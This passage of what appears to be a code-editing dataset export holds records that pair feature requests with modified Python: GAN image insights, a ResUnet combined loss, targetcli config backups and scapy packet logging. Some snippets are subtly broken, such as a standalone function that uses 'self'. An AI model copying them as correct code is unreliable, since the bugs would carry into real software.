parser.add_argument(\'--outdir\', default=\'results/watermark\')\n    parser.add_argument(\'--gan\', default=\'stylegan\')\n    parser.add_argument(\'--model\', default=\'church\')\n    parser.add_argument(\'--request\', default=\'multikey_markandbottom\')\n    parser.add_argument(\'--requestdir\', default=\'notebooks/masks\')\n    parser.add_argument(\'--sample_size\', type=int, default=1000)\n    parser.add_argument(\'--layer\', type=int, default=6)\n    parser.add_argument(\'--rank\', type=int, default=1)\n    parser.add_argument(\'--drank\', type=int, default=1)\n    parser.add_argument(\'--niters\', type=int, default=2001)\n    parser.add_argument(\'--piters\', type=int, default=10)\n    parser.add_argument(\'--lr\', type=float, default=0.05)\n    parser.add_argument(\'--nreps\', type=int, default=2)\n    parser.add_argument(\'--erasemethod\', default=\'ours\')\n    parser.add_argument(\'--extract_insights\', action=\'store_true\', default=False) #New\n    args = parser.parse_args()\n\n    rd = pidfile.reserve_dir(\n        args.outdir,\n        f\'erase-{args.gan}-{args.model}-{args.request}-{args.layer}\' +\n        f\'-{args.rank}-{args.niters}-{args.lr}-{args.erasemethod}\' +\n        f\'-{args.drank}\' +\n        (f\'-{args.nreps}\' if args.erasemethod == \'ours\' else \'\')\n    )\n\n    if args.gan == \'stylegan\':\n        #Modify: Added extract_insights parameter\n        model_for_covariance = load_seq_stylegan(args.model, mconv=\'seq\',\n                                                 truncation=1.00, extract_insights=args.extract_insights).cuda()\n        model = load_seq_stylegan(args.model, mconv=\'seq\',\n                                  truncation=0.50, extract_insights=args.extract_insights).cuda()\n        Rewriter = ganrewrite.SeqStyleGanRewriter\n\n    print(\'loaded model\')\n    zds = zdataset.z_dataset_for_model(model, size=args.sample_size)\n\n    for m in [mdl for mdl in [model_for_covariance, model] if mdl]:\n        gw = Rewriter(m, zds, args.layer, cachedir=rd(),\n                      low_rank_insert=True, low_rank_gradient=True,\n                      key_method={\'ours\': \'zca\', \'gandissect\': \'gandissect\'}[args.erasemethod],\n                      tight_paste=True)\n        if m == model_for_covariance:\n            gw.collect_2nd_moment()\n\n    reqfn = os.path.join(args.requestdir, args.gan, args.model,\n                         \'%s.json\' % args.request)\n    with open(reqfn) as f:\n        request = json.load(f)\n\n    if args.erasemethod == \'ours\':\n        for rep in range(args.nreps):\n            pbar.print(\'erasing objects from model\')\n            with pbar.reporthook(total=args.niters) as pbar_hook:\n                def pbar_cb(it, loss): return pbar_hook(it)\n                gw.apply_erase(request, rank=args.rank, drank=args.drank,\n                               niter=args.niters, piter=args.piters, lr=args.lr,\n                               update_callback=pbar_cb)\n    elif args.erasemethod == \'gandissect\':\n        mkey = gw.multi_key_from_selection(request[\'key\'], rank=args.drank)\n        gw.zero(mkey)\n    else:\n        assert args.erasemethod == \'none\'\n\n    pbar.print(\'saving images\')\n    savedir = rd(\'images\')\n    os.makedirs(savedir, exist_ok=True)\n    shutil.copyfile(\'utils/lightbox.html\', rd(\'images/+lightbox.html\'))\n\n    indices = None\n\n    #Modify: Pass extract_insights flag to save function\n    save_zds_images(savedir, gw.model, zds, indices=indices, extract_insights=args.extract_insights, insights_dir=rd(\'insights\'))\n    rd.done()\n    print(f\'saved to {savedir}\')\n\n#Modify: Updated function signature and implementation\ndef save_zds_images(dirname, model, zds,\n                    name_template="image_{}.png", batch_size=10, indices=None, extract_insights=False, insights_dir=None):\n    \'\'\'#Modify\n    Save generated images and optionally extract insights.\n    #New: Added extract_insights and insights_dir parameters.\n    \'\'\'\n    if indices is not None:\n        class Sampler(torch.utils.data.Sampler):\n            def __init__(self):\n                pass\n            def __iter__(self):\n                yield from indices\n            def __len__(self):\n                return len(indices)\n        sampler = Sampler()\n    else:\n        sampler = None\n\n    os.makedirs(dirname, exist_ok=True)\n    #New: Create insights directory if needed\n    if extract_insights and insights_dir:\n        os.makedirs(insights_dir, exist_ok=True)\n    \n    with torch.no_grad():\n        z_loader = torch.utils.data.DataLoader(IndexDataset(zds),\n                                               batch_size=batch_size, num_workers=2, sampler=sampler,\n                                               pin_memory=True)\n        saver = imgsave.SaveImagePool()\n        insights_list = [] #New\n        for indices, [z] in pbar(z_loader, desc=\'Saving images\'):\n            z = z.cuda()\n            im = model(z).cpu()\n            #New: Extract insights if model has insight_extractor\n            if extract_insights and hasattr(model, \'insight_extractor\'):\n                with torch.no_grad():\n                    z_cuda = z.cuda()\n                    bag = model.bag_from_z(z_cuda) if hasattr(model, \'bag_from_z\') else None\n                    if bag:\n                        insights = model.insight_extractor(bag)\n                        insights_list.append(insights.get(\'insights\', {}))\n            for i, index in enumerate(indices.tolist()):\n                filename = os.path.join(dirname, name_template.format(index))\n                saver.add(renormalize.as_image(im[i]), filename)\n    saver.join()\n    #New: Save insights to JSON file\n    if extract_insights and insights_dir and insights_list:\n        import json\n        insights_file = os.path.join(insights_dir, \'image_insights.json\')\n        with open(insights_file, \'w\') as f:\n            json.dump(insights_list, f, indent=2)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def save_zds_images(dirname, model, zds, name_template="image_{}.png", batch_size=10, indices=None):\n    if indices is not None:\n        class Sampler(torch.utils.data.Sampler):\n            def __init__(self):\n                pass\n            def __iter__(self):\n                yield from indices\n            def __len__(self):\n                return len(indices)\n        sampler = Sampler()\n    else:\n        sampler = None\n    os.makedirs(dirname, exist_ok=True)\n    with torch.no_grad():\n        z_loader = torch.utils.data.DataLoader(IndexDataset(zds), batch_size=batch_size, num_workers=2, sampler=sampler, pin_memory=True)\n        saver = imgsave.SaveImagePool()\n        insights = new_feature_function(model, zds, indices)\n        #Modify: Added call to new_feature_function\n        for indices, [z] in pbar(z_loader, desc=\'Saving images\'):\n            z = z.cuda()\n            im = model(z).cpu()\n            for i, index in enumerate(indices.tolist()):\n                filename = os.path.join(dirname, name_template.format(index))\n                saver.add(renormalize.as_image(im[i]), filename)\n    saver.join()\n    save_insights(dirname, insights)\n    #Modify: Added call to save_insights', '#file 2': "def main():\n    ...\n    save_zds_images(savedir, gw.model, zds, indices=indices)\n    rd.done()\n    print(f'saved to {savedir}')", '#file 3': 'No direct invocation from #file 3 to #file 1 or #file 2 found.', '#file 4': "def new_feature_function(model, zds, indices=None):\n    # New feature implementation\n    # This function will process the dataset and model to generate additional insights\n    insights = []\n    with torch.no_grad():\n        z_loader = torch.utils.data.DataLoader(IndexDataset(zds), batch_size=10, num_workers=2, sampler=indices, pin_memory=True)\n        for indices, [z] in pbar(z_loader, desc='Processing images'):\n            z = z.cuda()\n            im = model(z).cpu()\n            for i, index in enumerate(indices.tolist()):\n                insight = process_image(im[i])\n                insights.append(insight)\n    return insights\n\ndef process_image(image):\n    # Example processing function\n    # This function could analyze the image and return some insight\n    return {'mean_color': image.mean(dim=(1, 2)).tolist()}\n\ndef save_insights(dirname, insights):\n    # New: Function to save insights\n    with open(os.path.join(dirname, 'insights.json'), 'w') as f:\n        json.dump(insights, f, indent=4)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'BCEDiceLoss class in ResUnet/utils/metrics.py', 'invoking_code_segment': 'criterion = metrics.BCEDiceLoss() in ResUnet/train.py main() function', 'feature_description': 'Add a custom loss function to enhance the training process by implementing a weighted combination of BCE, Dice, and Focal losses with configurable weights and focal loss parameters for better handling of class imbalance and hard examples.', 'modified_complete_code': '# ResUnet/utils/metrics.py\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass BCEDiceLoss(nn.Module):\n    def __init__(self, bce_weight=0.5, dice_weight=0.5, focal_weight=0.0, focal_alpha=0.25, focal_gamma=2.0):\n        super(BCEDiceLoss, self).__init__()\n        self.bce_weight = bce_weight\n        self.dice_weight = dice_weight\n        self.focal_weight = focal_weight\n        self.focal_alpha = focal_alpha\n        self.focal_gamma = focal_gamma\n        self.bce_loss = nn.BCELoss()\n\n    def forward(self, inputs, targets):\n        # #Modify: Enhanced BCE loss calculation\n        bce = self.bce_loss(inputs, targets)\n        \n        # #Modify: Enhanced Dice loss calculation\n        inputs_flat = inputs.view(-1)\n        targets_flat = targets.view(-1)\n        intersection = (inputs_flat * targets_flat).sum()\n        dice = 1 - (2.0 * intersection + 1e-7) / (inputs_flat.sum() + targets_flat.sum() + 1e-7)\n        \n        # #New: Focal loss for handling hard examples\n        focal_loss = torch.tensor(0.0, device=inputs.device)\n        if self.focal_weight &gt; 0:\n            p = inputs\n            focal_loss = -self.focal_alpha * ((1 - p) ** self.focal_gamma) * targets * torch.log(p + 1e-7) - (1 - self.focal_alpha) * (p ** self.focal_gamma) * (1 - targets) * torch.log(1 - p + 1e-7)\n            focal_loss = focal_loss.mean()\n        \n        # #Modify: Weighted combination of losses\n        total_loss = (self.bce_weight * bce + self.dice_weight * dice + self.focal_weight * focal_loss) / (self.bce_weight + self.dice_weight + self.focal_weight + 1e-7)\n        return total_loss\n\n# #New: Additional custom loss function for enhanced training\nclass EnhancedBCEDiceLoss(nn.Module):\n    def __init__(self, bce_weight=0.5, dice_weight=0.3, focal_weight=0.2, focal_alpha=0.25, focal_gamma=2.0):\n        super(EnhancedBCEDiceLoss, self).__init__()\n        self.bce_weight = bce_weight\n        self.dice_weight = dice_weight\n        self.focal_weight = focal_weight\n        self.focal_alpha = focal_alpha\n        self.focal_gamma = focal_gamma\n        self.bce_loss = nn.BCELoss()\n\n    def forward(self, inputs, targets):\n        bce = self.bce_loss(inputs, targets)\n        inputs_flat = inputs.view(-1)\n        targets_flat = targets.view(-1)\n        intersection = (inputs_flat * targets_flat).sum()\n        dice = 1 - (2.0 * intersection + 1e-7) / (inputs_flat.sum() + targets_flat.sum() + 1e-7)\n        p = inputs\n        focal_loss = -self.focal_alpha * ((1 - p) ** self.focal_gamma) * targets * torch.log(p + 1e-7) - (1 - self.focal_alpha) * (p ** self.focal_gamma) * (1 - targets) * torch.log(1 - p + 1e-7)\n        focal_loss = focal_loss.mean()\n        total_loss = (self.bce_weight * bce + self.dice_weight * dice + self.focal_weight * focal_loss) / (self.bce_weight + self.dice_weight + self.focal_weight)\n        return total_loss\n\n# ResUnet/train.py (modified section)\n# #Modify: Import enhanced loss function\nfrom utils import metrics\n\ndef main(hp, num_epochs, resume, name):\n    checkpoint_dir = "{}/{}".format(hp.checkpoints, name)\n    os.makedirs(checkpoint_dir, exist_ok=True)\n    os.makedirs("{}/{}".format(hp.log, name), exist_ok=True)\n    writer = MyWriter("{}/{}".format(hp.log, name))\n    \n    if hp.RESNET_PLUS_PLUS:\n        model = ResUnetPlusPlus(3).cuda()\n    else:\n        model = ResUnet(3, 64).cuda()\n    \n    # #Modify: Use enhanced loss function with custom weights\n    if hasattr(hp, \'loss_weights\'):\n        criterion = metrics.EnhancedBCEDiceLoss(\n            bce_weight=hp.loss_weights.get(\'bce\', 0.5),\n            dice_weight=hp.loss_weights.get(\'dice\', 0.3),\n            focal_weight=hp.loss_weights.get(\'focal\', 0.2),\n            focal_alpha=hp.loss_weights.get(\'focal_alpha\', 0.25),\n            focal_gamma=hp.loss_weights.get(\'focal_gamma\', 2.0)\n        )\n    else:\n        criterion = metrics.EnhancedBCEDiceLoss()\n    \n    optimizer = torch.optim.Adam(model.parameters(), lr=hp.lr)\n    lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.1)\n    \n    best_loss = 999\n    start_epoch = 0\n    \n    if resume:\n        if os.path.isfile(resume):\n            print("=&gt; loading checkpoint \'{}\'".format(resume))\n            checkpoint = torch.load(resume)\n            start_epoch = checkpoint["epoch"]\n            best_loss = checkpoint["best_loss"]\n            model.load_state_dict(checkpoint["state_dict"])\n            optimizer.load_state_dict(checkpoint["optimizer"])\n            print("=&gt; loaded checkpoint \'{}\' (epoch {})".format(resume, checkpoint["epoch"]))\n        else:\n            print("=&gt; no checkpoint found at \'{}\'".format(args.resume))\n    \n    mass_dataset_train = dataloader.ImageDataset(hp, transform=transforms.Compose([dataloader.ToTensorTarget()]))\n    mass_dataset_val = dataloader.ImageDataset(hp, False, transform=transforms.Compose([dataloader.ToTensorTarget()]))\n    train_dataloader = DataLoader(mass_dataset_train, batch_size=hp.batch_size, num_workers=2, shuffle=True)\n    val_dataloader = DataLoader(mass_dataset_val, batch_size=1, num_workers=2, shuffle=False)\n    \n    step = 0\n    for epoch in range(start_epoch, num_epochs):\n        print("Epoch {}/{}".format(epoch, num_epochs - 1))\n        print("-" * 10)\n        lr_scheduler.step()\n        train_acc = metrics.MetricTracker()\n        train_loss = metrics.MetricTracker()\n        loader = tqdm(train_dataloader, desc="training")\n        \n        for idx, data in enumerate(loader):\n            inputs = data["sat_img"].cuda()\n            labels = data["map_img"].cuda()\n            optimizer.zero_grad()\n            outputs = model(inputs)\n            loss = criterion(outputs, labels)\n            loss.backward()\n            optimizer.step()\n            train_acc.update(metrics.dice_coeff(outputs, labels), outputs.size(0))\n            train_loss.update(loss.data.item(), outputs.size(0))\n            \n            if step % hp.logging_step == 0:\n                writer.log_training(train_loss.avg, train_acc.avg, step)\n                loader.set_description("Training Loss: {:.4f} Acc: {:.4f}".format(train_loss.avg, train_acc.avg))\n            \n            if step % hp.validation_interval == 0:\n                valid_metrics = validation(val_dataloader, model, criterion, writer, step)\n                save_path = os.path.join(checkpoint_dir, "%s_checkpoint_%04d.pt" % (name, step))\n                best_loss = min(valid_metrics["valid_loss"], best_loss)\n                torch.save({\n                    "step": step,\n                    "epoch": epoch,\n                    "arch": "ResUnet",\n                    "state_dict": model.state_dict(),\n                    "best_loss": best_loss,\n                    "optimizer": optimizer.state_dict(),\n                }, save_path)\n                print("Saved checkpoint to: %s" % save_path)\n            step += 1'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class ResUnet(nn.Module):\n    def __init__(self, channel, filters=[64, 128, 256, 512]):\n        super(ResUnet, self).__init__()\n        ...\n    def forward(self, x):\n        ...\n        return output', '#file 2': 'from core.res_unet import ResUnet\nfrom core.res_unet_plus import ResUnetPlusPlus\nfrom utils import metrics\nfrom new_file import CustomLoss  #New\n...\nif hp.RESNET_PLUS_PLUS:\n    model = ResUnetPlusPlus(3).cuda()\nelse:\n    model = ResUnet(3, 64).cuda()\n...\ncriterion = CustomLoss()  #Modify', '#file 3': 'outputs = model(inputs)', '#file 4': 'import torch.nn as nn\nfrom utils import metrics\n\nclass CustomLoss(nn.Module):\n    def __init__(self):\n        super(CustomLoss, self).__init__()\n        self.bce = nn.BCELoss()\n        self.dice = metrics.DiceLoss()\n\n    def forward(self, outputs, labels):\n        bce_loss = self.bce(outputs, labels)\n        dice_loss = self.dice(outputs, labels)\n        return bce_loss + dice_loss'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'UIRoot class initialization and ui_command_saveconfig method in ui_root.py', 'invoking_code_segment': 'TargetCLI class initialization and client_thread method in targetclid.py', 'feature_description': 'Add a feature to automatically backup the configuration file before saving. This feature creates timestamped gzip-compressed backups of the configuration file, maintains a maximum number of backup files, and compares the current configuration with the most recent backup to avoid creating duplicate backups.', 'modified_complete_code': '# ui_root.py modifications:\n\nclass UIRoot(UINode):\n    \'\'\'\n    The targetcli hierarchy root node.\n    \'\'\'\n    def __init__(self, shell, as_root=False):\n        UINode.__init__(self, \'/\', shell=shell)\n        self.as_root = as_root\n        self.rtsroot = RTSRoot()\n        #New: Initialize backup configuration settings\n        self.backup_enabled = True\n        self.max_backup_files = 10\n\n    # ... existing refresh method ...\n\n    def _compare_files(self, backupfile, savefile):\n        \'\'\'\n        Compare backfile and saveconfig file\n        \'\'\'\n        backupfilepath = Path(backupfile)\n        if PurePosixPath(backupfile).suffix == \'.gz\':\n            try:\n                with gzip.open(backupfilepath, \'rb\') as fbkp:\n                    fdata_bkp = fbkp.read()\n            except OSError as e:\n                self.shell.log.warning(f"Could not gzip open backupfile {backupfile}: {e.strerror}")\n                return False\n        else:\n            try:\n                fdata_bkp = backupfilepath.read_bytes()\n            except OSError as e:\n                self.shell.log.warning(f"Could not open backupfile {backupfile}: {e.strerror}")\n                return False\n\n        try:\n            fdata = Path(savefile).read_bytes()\n        except OSError as e:\n            self.shell.log.warning(f"Could not open saveconfig file {savefile}: {e.strerror}")\n            return False\n\n        return fdata_bkp == fdata\n\n    def _create_dir(self, dirname):\n        \'\'\'\n        create directory with permissions 0o600 set\n        if directory already exists, set right perms\n        \'\'\'\n        mode = stat.S_IRUSR | stat.S_IWUSR  # 0o600\n        dir_path = Path(dirname)\n        if not dir_path.exists():\n            umask = 0o777 ^ mode  # Prevents always downgrading umask to 0\n            umask_original = os.umask(umask)\n            try:\n                dir_path.mkdir(mode=mode)\n            except OSError as exe:\n                raise ExecutionError(f"Cannot create directory [{dirname}] {exe.strerror}.")\n            finally:\n                os.umask(umask_original)\n        elif dirname == default_target_dir and (os.stat(dirname).st_mode &amp; 0o777) != mode:\n            os.chmod(dirname, mode)\n\n    def _save_backups(self, savefile):\n        \'\'\'\n        Take backup of config-file if needed.\n        #Modify: Enhanced to support automatic backup before saving\n        \'\'\'\n        # Only save backups if saving to default location\n        if savefile != default_save_file:\n            return\n\n        #New: Check if backup is enabled\n        if not self.backup_enabled:\n            return\n\n        backup_dir = os.path.dirname(savefile) + "/backup/"\n        backup_name = "saveconfig-" + \\\n                      datetime.now().strftime("%Y%m%d-%H:%M:%S") + "-json.gz"\n        backupfile = backup_dir + backup_name\n        backup_error = None\n\n        self._create_dir(backup_dir)\n\n        # Only save backups if savefile exits\n        if not Path(savefile).exists():\n            return\n\n        backed_files_list = sorted(glob(os.path.dirname(savefile) + \\\n                                   "/backup/saveconfig-*json*"))\n\n        # Save backup if backup dir is empty, or savefile is differnt from recent backup copy\n        if not backed_files_list or not self._compare_files(backed_files_list[-1], savefile):\n            mode = stat.S_IRUSR | stat.S_IWUSR  # 0o600\n            umask = 0o777 ^ mode  # Prevents always downgrading umask to 0\n            umask_original = os.umask(umask)\n            try:\n                with open(savefile, \'rb\') as f_in, gzip.open(backupfile, \'wb\') as f_out:\n                    shutil.copyfileobj(f_in, f_out)\n                    f_out.flush()\n            except OSError as ioe:\n                backup_error = ioe.strerror or "Unknown error"\n            finally:\n                os.umask(umask_original)\n\n            if backup_error is None:\n                # remove excess backups\n                #Modify: Use instance variable for max_backup_files\n                max_backup_files = self.max_backup_files\n\n                try:\n                    prefs = Path(universal_prefs_file).read_text()\n                    backups = [line for line in prefs.splitlines() if re.match(\n                        r\'^max_backup_files\\s*=\', line)]\n                    if max_backup_files &lt; int(backups[0].split(\'=\')[1].strip()):\n                        max_backup_files = int(backups[0].split(\'=\')[1].strip())\n                except:\n                    self.shell.log.debug(f"No universal prefs file \'{universal_prefs_file}\'.")\n\n                files_to_unlink = list(reversed(backed_files_list))[max_backup_files - 1:]\n                for f in files_to_unlink:\n                    with ignored(IOError):\n                        Path(f).unlink()\n\n                self.shell.log.info("Last %d configs saved in %s."\n                                    % (max_backup_files, backup_dir))\n            else:\n                self.shell.log.warning(f"Could not create backup file {backupfile}: {backup_error}.")\n\n    def ui_command_saveconfig(self, savefile=default_save_file):\n        \'\'\'\n        Saves the current configuration to a file so that it can be restored\n        on next boot.\n        #Modify: Now includes automatic backup before saving\n        \'\'\'\n        self.assert_root()\n\n        if not savefile:\n            savefile = default_save_file\n\n        savefile = os.path.expanduser(savefile)\n\n        save_dir = os.path.dirname(savefile)\n        self._create_dir(save_dir)\n        #Modify: Call backup before saving\n        self._save_backups(savefile)\n\n        self.rtsroot.save_to_file(savefile)\n\n        self.shell.log.info(f"Configuration saved to {savefile}")\n\n    #New: Add method to enable/disable backup feature\n    def set_backup_enabled(self, enabled):\n        \'\'\'\n        Enable or disable automatic backup feature\n        \'\'\'\n        self.backup_enabled = enabled\n\n    #New: Add method to configure max backup files\n    def set_max_backup_files(self, max_files):\n        \'\'\'\n        Set maximum number of backup files to keep\n        \'\'\'\n        try:\n            self.max_backup_files = int(max_files)\n        except ValueError:\n            raise ExecutionError(f"max_files must be an integer, got {max_files}")\n\n    # ... rest of existing methods ...\n\n# targetclid.py modifications:\n\nclass TargetCLI:\n    def __init__(self):\n        \'\'\'\n        initializer\n        #Modify: Enhanced to configure backup settings\n        \'\'\'\n        # socket for unix communication\n        self.socket_path = \'/var/run/targetclid.sock\'\n        # pid file for defending on multiple daemon runs\n        self.pid_file = \'/var/run/targetclid.pid\'\n\n        self.NoSignal = True\n        self.sock = None\n\n        # shell console methods\n        self.shell = ConfigShell(getenv("TARGETCLI_HOME", \'~/.targetcli\'))\n        self.con = self.shell.con\n        self.display = self.shell.con.display\n        self.render = self.shell.con.render_text\n\n        # Handle SIGINT SIGTERM SIGHUP gracefully\n        signal.signal(signal.SIGINT, self.signal_handler)\n        signal.signal(signal.SIGTERM, self.signal_handler)\n        signal.signal(signal.SIGHUP, self.signal_handler)\n\n        try:\n            self.pfd = open(self.pid_file, \'w+\')  # noqa: SIM115\n        except OSError as e:\n            self.display(\n                self.render(f"opening pidfile failed: {e!s}", \'red\'),\n            )\n            sys.exit(1)\n\n        self.try_pidfile_lock()\n\n        is_root = False\n        if getuid() == 0:\n            is_root = True\n\n        try:\n            root_node = UIRoot(self.shell, as_root=is_root)\n            root_node.refresh()\n            #New: Configure backup settings from UIRoot\n            self.root_node = root_node\n            self.root_node.set_backup_enabled(True)\n            self.root_node.set_max_backup_files(10)\n        except Exception as error:\n            self.display(self.render(str(error), \'red\'))\n            if not is_root:\n                self.display(self.render("Retry as root.", \'red\'))\n            self.pfd.close()\n            sys.exit(1)\n\n        # Keep track, for later use\n        self.con_stdout_ = self.con._stdout\n        self.con_stderr_ = self.con._stderr\n\n    # ... existing methods ...\n\n    def client_thread(self, connection):\n        \'\'\'\n        Handle commands from client\n        #Modify: Ensures backup is enabled during command execution\n        \'\'\'\n        # load the prefs\n        self.shell.prefs.load()\n\n        still_listen = True\n        # Receive the data in small chunks and retransmit it\n        while still_listen:\n            data = connection.recv(65535)\n            if b\'-END@OF@DATA-\' in data:\n                connection.close()\n                still_listen = False\n            else:\n                self.con._stdout = self.con._stderr = f = tempfile.NamedTemporaryFile(mode=\'w\', delete=False)\n                try:\n                    # extract multiple commands delimited with \'%\'\n                    list_data = data.decode().split(\'%\')\n                    for cmd in list_data:\n                        #New: Ensure backup is enabled before running commands\n                        if hasattr(self, \'root_node\'):\n                            self.root_node.set_backup_enabled(True)\n                        self.shell.run_cmdline(cmd)\n                except Exception as e:\n                    print(str(e), file=f)  # push error to stream\n\n                # Restore\n                self.con._stdout = self.con_stdout_\n                self.con._stderr = self.con_stderr_\n                f.close()\n\n                with open(f.name) as f:\n                    output = f.read()\n                    var = struct.pack(\'i\', len(output))\n                    connection.sendall(var)  # length of string\n                    if len(output):\n                        connection.sendall(output.encode())  # actual string\n\n                Path(f.name).unlink()'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def ui_command_saveconfig(self, savefile=default_save_file):\n    \'\'\'\n    Saves the current configuration to a file so that it can be restored\n    on next boot.\n    \'\'\'\n    self.assert_root()\n\n    if not savefile:\n        savefile = default_save_file\n\n    savefile = os.path.expanduser(savefile)\n\n    save_dir = os.path.dirname(savefile)\n    self._create_dir(save_dir)\n    #Modify\n    backup_config(savefile)\n\n    self.rtsroot.save_to_file(savefile)\n\n    self.shell.log.info(f"Configuration saved to {savefile}")', '#file 2': 'def ui_command_saveconfig(self, savefile=default_save_file):\n    \'\'\'\n    Saves the current configuration to a file so that it can be restored\n    on next boot.\n    \'\'\'\n    self.assert_root()\n\n    if not savefile:\n        savefile = default_save_file\n\n    savefile = os.path.expanduser(savefile)\n\n    save_dir = os.path.dirname(savefile)\n    self._create_dir(save_dir)\n    #Modify\n    backup_config(savefile)\n\n    self.rtsroot.save_to_file(savefile)\n\n    self.shell.log.info(f"Configuration saved to {savefile}")', '#file 3': 'def ui_command_saveconfig(self, savefile=default_save_file):\n    \'\'\'\n    Saves the current configuration to a file so that it can be restored\n    on next boot.\n    \'\'\'\n    self.assert_root()\n\n    if not savefile:\n        savefile = default_save_file\n\n    savefile = os.path.expanduser(savefile)\n\n    save_dir = os.path.dirname(savefile)\n    self._create_dir(save_dir)\n    #Modify\n    backup_config(savefile)\n\n    self.rtsroot.save_to_file(savefile)\n\n    self.shell.log.info(f"Configuration saved to {savefile}")', '#file 4': 'def backup_config(savefile):\n    backup_dir = os.path.dirname(savefile) + "/backup/"\n    backup_name = "saveconfig-" + datetime.now().strftime("%Y%m%d-%H:%M:%S") + "-json.gz"\n    backupfile = backup_dir + backup_name\n    backup_error = None\n\n    self._create_dir(backup_dir)\n\n    if not Path(savefile).exists():\n        return\n\n    backed_files_list = sorted(glob(os.path.dirname(savefile) + "/backup/saveconfig-*json*"))\n\n    if not backed_files_list or not self._compare_files(backed_files_list[-1], savefile):\n        mode = stat.S_IRUSR | stat.S_IWUSR  # 0o600\n        umask = 0o777 ^ mode  # Prevents always downgrading umask to 0\n        umask_original = os.umask(umask)\n        try:\n            with open(savefile, \'rb\') as f_in, gzip.open(backupfile, \'wb\') as f_out:\n                shutil.copyfileobj(f_in, f_out)\n                f_out.flush()\n        except OSError as ioe:\n            backup_error = ioe.strerror or "Unknown error"\n        finally:\n            os.umask(umask_original)\n\n        if backup_error is None:\n            max_backup_files = int(self.shell.prefs[\'max_backup_files\'])\n\n            try:\n                prefs = Path(universal_prefs_file).read_text()\n                backups = [line for line in prefs.splitlines() if re.match(\n                    r\'^max_backup_files\\s*=\',\n                    line)]\n                if max_backup_files &lt; int(backups[0].split(\'=\')[1].strip()):\n                    max_backup_files = int(backups[0].split(\'=\')[1].strip())\n            except:\n                self.shell.log.debug(f"No universal prefs file \'{universal_prefs_file}\'.")\n\n            files_to_unlink = list(reversed(backed_files_list))[max_backup_files - 1:]\n            for f in files_to_unlink:\n                with ignored(IOError):\n                    Path(f).unlink()\n\n            self.shell.log.info("Last %d configs saved in %s."\n                                % (max_backup_files, backup_dir))\n        else:\n            self.shell.log.warning(f"Could not create backup file {backupfile}: {backup_error}.")\n'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'TCPListener.__init__, TCPListener.dispatch, TCPListener.send', 'invoking_code_segment': 'MockListener.__init__, MockListener.send, MockListener.start_daemon, test_unit.py test functions calling listener.dispatch and listener.received_packets', 'feature_description': 'Add a packet logging feature to log all packets received and sent by the TCPListener. This feature will maintain separate logs for incoming and outgoing packets, with timestamps and packet details, allowing for comprehensive packet tracking and debugging.', 'modified_complete_code': '# File 1: teeceepee/teeceepee/tcp_listener.py\nimport random\nimport threading\nfrom scapy.all import sniff, TCP, send, IP\nfrom datetime import datetime\n\nclass TCPListener(object):\n    def __init__(self, ip_address="127.0.0.1"):\n        self.ip_address = ip_address\n        self.source_port = random.randint(12345, 50000)\n        self.open_sockets = {}\n        #New: Initialize packet logging\n        self.packet_log = []\n        self.start_daemon()\n\n    def dispatch(self, pkt):\n        #New: Log incoming packet\n        self._log_packet(pkt, direction="incoming")\n        \n        if not isinstance(pkt.payload.payload, TCP):\n            return\n        ip, port = pkt.payload.dst, pkt.dport\n        if ip != self.ip_address:\n            return\n\n        if (ip, port) not in self.open_sockets:\n            reset = IP(src=ip, dst=pkt.payload.src) / TCP(seq=pkt.ack, sport=port, dport=pkt.sport, flags="R")\n            self.send(reset)\n            return\n        conn = self.open_sockets[ip, port]\n        conn.handle(pkt)\n\n    def send(self, packet, verbose=0):\n        #New: Log outgoing packet\n        self._log_packet(packet, direction="outgoing")\n        send(packet, verbose=verbose)\n\n    #New: Add packet logging method\n    def _log_packet(self, packet, direction="unknown"):\n        """Log packet with timestamp and direction."""\n        log_entry = {\n            "timestamp": datetime.now().isoformat(),\n            "direction": direction,\n            "packet": packet,\n            "packet_summary": packet.summary()\n        }\n        self.packet_log.append(log_entry)\n\n    #New: Add method to retrieve packet logs\n    def get_packet_log(self):\n        """Return the complete packet log."""\n        return self.packet_log\n\n    #New: Add method to clear packet logs\n    def clear_packet_log(self):\n        """Clear the packet log."""\n        self.packet_log = []\n\n    def get_port(self):\n        # We need to return a new port number to each new connection\n        self.source_port += 1\n        return self.source_port\n\n    def open(self, ip, port, conn):\n        self.open_sockets[ip, port]  = conn\n\n    def close(self, ip, port):\n        del self.open_sockets[ip, port]\n\n    def listen(self):\n        filter_rule = "tcp and ip dst %s" % self.ip_address\n        sniff(filter=filter_rule,  prn=self.dispatch, store=0)\n\n    def start_daemon(self):\n        t = threading.Thread(target=self.listen)\n        t.daemon=True\n        t.start()\n\n# File 2: teeceepee/test/mock_listener.py\n""" Mock listener for testing. """\n\nfrom teeceepee.tcp_listener import TCPListener\n\n\nclass MockListener(TCPListener):\n    """\n    Doesn\'t actually send packets.\n    """\n    def __init__(self, ip_address="127.0.0.1"):\n        super(self.__class__, self).__init__(ip_address)\n        self.received_packets = []\n\n    def send(self, packet):\n        #Modify: Log outgoing packet before adding to received_packets\n        self._log_packet(packet, direction="outgoing")\n        self.received_packets.append(packet)\n\n    def start_daemon(self):\n        pass\n\n# File 3: teeceepee/test/test_unit.py (additions for testing packet logging)\n# Add these test functions to the existing test_unit.py file:\n\n#New: Add test for packet logging feature\ndef test_packet_logging():\n    """\n    Test that packets are properly logged with direction and timestamp.\n    """\n    packet_log = rdpcap("test/inputs/tiniest-session.pcap")\n    listener, conn = create_session(packet_log)\n    \n    initial_log_count = len(listener.get_packet_log())\n    \n    syn_ack = packet_log[1]\n    listener.dispatch(syn_ack)\n    \n    # Check that packet was logged\n    assert len(listener.get_packet_log()) &gt; initial_log_count\n    \n    # Check log entry structure\n    log_entry = listener.get_packet_log()[-1]\n    assert "timestamp" in log_entry\n    assert "direction" in log_entry\n    assert "packet" in log_entry\n    assert "packet_summary" in log_entry\n    assert log_entry["direction"] == "incoming"\n\n#New: Add test for outgoing packet logging\ndef test_outgoing_packet_logging():\n    """\n    Test that outgoing packets are properly logged.\n    """\n    listener = MockListener()\n    conn = TCPSocket(listener)\n    conn.connect("localhost", 80)\n    \n    # Check that SYN packet was logged as outgoing\n   